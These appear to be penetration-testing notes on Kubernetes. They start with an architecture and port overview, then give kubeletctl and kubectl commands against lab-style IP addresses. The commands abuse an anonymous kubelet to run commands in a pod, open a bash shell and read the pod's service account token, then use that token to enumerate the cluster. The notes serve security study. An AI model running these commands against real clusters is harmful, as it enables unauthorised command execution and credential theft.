Kubernetes

Container Orchestration Platform

Architecture

Kubernetes Control Plane

The brain of the Kubernetes cluster: it makes global decisions (such as scheduling) and continuously monitors cluster state.

  • kube-apiserver

    • Is the central point of communication for all Kubernetes components.

    • It exposes the Kubernetes API and serves as the front-end for the Kubernetes control plane.

    • All interactions go through the API server.

    • It handles requests for cluster state and read/write operations to/from etcd.

    • Handles authentication, authorization, and admission control.

  • etcd

    • Is a distributed key-value store used to store all cluster data and state:

      • Configuration of all resources.

      • The desired state.

      • The current state.

    • etcd ensures that the state is replicated across multiple nodes.

  • kube-controller-manager

    • Is a daemon that runs in the control plane and manages the controllers that regulate the state of the cluster.

    • Controllers are responsible for ensuring the desired state of the cluster matches the current state. If there’s a mismatch, controllers take action to reconcile that state:

      • For example, if a pod crashes, the replication controller will create a new pod to maintain the desired number of replicas.

    • Some key controllers include:

      • Deployment controller: Manages rollouts and, through ReplicaSets, ensures the desired number of pod replicas are running.

      • Node controller: Monitors nodes for health and takes actions when nodes fail.

      • Job controller: Manages the execution of batch jobs.
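
The reconciliation behaviour these controllers share can be caricatured as a loop that compares desired and current state and acts on the difference (a toy sketch with fabricated replica counts, not real controller code):

```shell
# Toy reconciliation loop: converge the current replica count toward the desired one
desired=3
current=1

while [ "$current" -ne "$desired" ]; do
    if [ "$current" -lt "$desired" ]; then
        echo "creating pod replica $((current + 1))"   # scale up
        current=$((current + 1))
    else
        echo "deleting pod replica $current"           # scale down
        current=$((current - 1))
    fi
done
```

Real controllers run this comparison continuously against the state stored in etcd, via the API server.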

  • kube-scheduler

    • Is responsible for scheduling pods to run on the worker nodes.

    • It watches for newly created pods that do not have a node assigned, and then selects the most appropriate node to run the pod based on resource requirements, node availability, and other constraints.
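
For example, a pod spec can constrain where the scheduler may place it through resource requests and node selectors (illustrative manifest; the name and label are hypothetical):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: scheduling-demo        # hypothetical name
spec:
  nodeSelector:
    disktype: ssd              # only nodes labelled disktype=ssd are candidates
  containers:
    - name: app
      image: nginx:1.25
      resources:
        requests:              # the scheduler only picks a node with this much free capacity
          cpu: "250m"
          memory: "128Mi"
```
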

  • cloud-controller-manager

    • Interacts with the cloud provider’s API to manage resources such as:

      • Managing load balancers.

      • Handling cloud-specific features.

    • It abstracts the cloud provider-specific logic, allowing Kubernetes to be agnostic to the underlying infrastructure.

Kubernetes Worker Node

Worker nodes are the machines (either virtual or physical) that run the actual application workloads. A Kubernetes cluster can have multiple worker nodes, and each one runs several essential components:

  • Kubelet

    • Is an agent that runs on every worker node.

    • It ensures that the containers described in the pod specs are running and healthy.

    • Monitors the state of the node and the pods running on it. It communicates with the API server to report the status of the node and its workloads.

    • If a pod is not running as expected, the kubelet can restart it.

  • Kube Proxy

    • Is a network proxy that runs on every worker node.

    • It maintains network rules for pod communication, allowing services in the cluster to be accessed reliably.

    • It manages the service abstraction by routing traffic to the correct pods. If a service points to multiple pods, kube-proxy ensures the traffic is balanced between the pods using round-robin or other strategies.
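
That balancing behaviour can be pictured as cycling through a service's endpoints (a toy shell illustration with fabricated pod IPs; real kube-proxy programs iptables/IPVS rules rather than running code like this):

```shell
# Fabricated pod endpoints behind a single service
endpoints="10.244.0.5 10.244.0.6 10.244.0.7"
i=0

# Round-robin: return the next endpoint on each call
pick_endpoint() {
    set -- $endpoints          # word-split into positional parameters
    idx=$(( i % $# + 1 ))
    i=$(( i + 1 ))
    eval "echo \${$idx}"
}

pick_endpoint   # 10.244.0.5
pick_endpoint   # 10.244.0.6
```
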

  • Container Runtime

    • Responsible for running the containers on each node (e.g., containerd, CRI-O, or historically Docker via dockershim); the kubelet drives it through the Container Runtime Interface (CRI).

    • When the kubelet schedules a pod, the container runtime is used to pull the container images and start the containers.

  • Pods

    • The smallest and most basic deployable objects in Kubernetes. A pod represents one or more containers running together on the same node.

    • Containers in the same pod share one network namespace, which means they can communicate with each other over localhost, and they can share storage volumes.

    • Typically, a pod is used to run a single container, but it can also contain multiple containers that work closely together (e.g., a main app container and a helper container like a logging agent).
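
A multi-container pod of that shape might look like the following (illustrative manifest; names and images are hypothetical):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: app-with-logger        # hypothetical name
spec:
  volumes:
    - name: logs
      emptyDir: {}             # scratch volume shared by both containers
  containers:
    - name: app                # main application container
      image: nginx:1.25
      volumeMounts:
        - name: logs
          mountPath: /var/log/nginx
    - name: log-agent          # helper container reading the same logs
      image: busybox:1.36
      command: ["sh", "-c", "tail -F /logs/access.log"]
      volumeMounts:
        - name: logs
          mountPath: /logs
```
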


Ports and Protocols

Default control plane and node ports (the targets of the enumeration below):

  • 6443/TCP: kube-apiserver (HTTPS; some distributions use 8443, as in the examples below).

  • 2379-2380/TCP: etcd client and peer API.

  • 10250/TCP: kubelet API (the port kubeletctl targets).

  • 10256/TCP: kube-proxy health check.

  • 30000-32767/TCP: NodePort services range.

Enumeration

List pods
kubeletctl pods -s 10.10.11.133
Running pods
kubeletctl runningpods -s 10.10.11.133 | jq -c '.items[].metadata | [.name, .namespace]'
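
The jq filter above reduces the kubelet's verbose JSON to compact [name, namespace] pairs. A local sketch of the same filter against fabricated sample data:

```shell
# Fabricated sample of the JSON shape returned by `kubeletctl runningpods`
cat > /tmp/runningpods.json <<'EOF'
{"items": [
  {"metadata": {"name": "nginx",   "namespace": "default"}},
  {"metadata": {"name": "coredns", "namespace": "kube-system"}}
]}
EOF

# Same filter as above: one compact [name, namespace] array per pod
jq -c '.items[].metadata | [.name, .namespace]' /tmp/runningpods.json
```
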
  • The kubelet can allow anonymous access, in which case it may be possible to use commands such as run and exec:

Scan for remote command execution (RCE)
kubeletctl -s 10.129.96.98 scan rce
Spawn an interactive shell inside a pod
kubeletctl -s 10.10.11.133 exec "/bin/bash" -p nginx -c nginx
  • Default directories inside a pod where the service account token and CA certificate are stored:

    • /var/run/secrets/kubernetes.io/serviceaccount

    • /run/secrets/kubernetes.io/serviceaccount

    • /secrets/kubernetes.io/serviceaccount
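
The token stored at those paths is a JWT, so its payload (service account name and namespace) can be inspected offline before using it. A sketch with a fabricated token; a real one comes from the paths above:

```shell
# Fabricated JWT for illustration only (header.payload.signature, base64url segments)
payload='{"kubernetes.io/serviceaccount/namespace":"default"}'
b64=$(printf '%s' "$payload" | base64 -w0 | tr '+/' '-_' | tr -d '=')
token="eyJhbGciOiJSUzI1NiJ9.$b64.fakesig"

# Extract the payload (second dot-separated segment), undo the base64url
# substitutions, and restore '=' padding to a multiple of 4 before decoding
seg=$(printf '%s' "$token" | cut -d. -f2 | tr '_-' '/+')
seg="$seg$(printf '%*s' $(( (4 - ${#seg} % 4) % 4 )) '' | tr ' ' '=')"
printf '%s\n' "$seg" | base64 -d
```
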

kubectl

  • Authenticate to the API using the token and ca.crt; first save the token as an environment variable to make it easier to work with:

export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)
  • Copy ca.crt to a local file and start enumerating:

Print info about the running pod
kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get pod
List namespaces
kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get namespaces
Print cluster info (API server and service endpoints)
kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token cluster-info
List all permissions
kubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token
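
Repeating the --server/--certificate-authority/--token flags gets tedious; a small wrapper function can inject them into every call (a sketch using the same example values as above; adjust the server, cert path, and token variable to your target):

```shell
# Wrapper that adds the connection flags to every kubectl invocation;
# assumes $token was exported earlier and ca.crt is in the working directory
k() {
    kubectl --server https://10.10.11.133:8443 \
            --certificate-authority=ca.crt \
            --token="$token" "$@"
}

# Usage: k get pod; k get namespaces; k auth can-i --list
```
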

Exploitation
